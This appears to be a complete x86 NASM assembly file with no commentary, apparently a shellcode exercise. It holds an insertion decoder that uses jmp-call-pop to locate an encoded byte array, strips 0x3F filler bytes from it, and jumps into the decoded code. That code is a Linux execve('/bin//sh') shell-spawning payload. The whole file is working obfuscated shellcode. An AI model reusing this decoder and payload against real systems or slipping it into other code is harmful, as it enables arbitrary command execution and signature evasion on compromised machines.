global _start

section .text

_start:

 jmp getaddress

mainflow:
 pop esi
 lea edi, [esi]
 xor ecx, ecx

decode:
 mov bx, word [esi + ecx]
 cmp bx, 0xF1F1 
 je short execve 

 inc ecx
 cmp bl, 0x3F
 je short decode

 mov byte [edi], bl
 inc edi 
 jmp short decode



getaddress: call mainflow

execve: db 0x3F, 0x3F, 0x3F, 0x31, 0x3F, 0xc9, 0x3F, 0xf7, 0xe1, 0x3F, 0xb0, 0x0b, 0x3F, 0x51, 0x68, 0x3F, 0x2f, 0x2f, 0x3F, 0x73, 0x68, 0x3F, 0x68, 0x2f, 0x3F, 0x62, 0x69, 0x3F, 0x6e, 0x89, 0x3F, 0xe3, 0xcd, 0x3F, 0x80, 0xF1, 0xF1
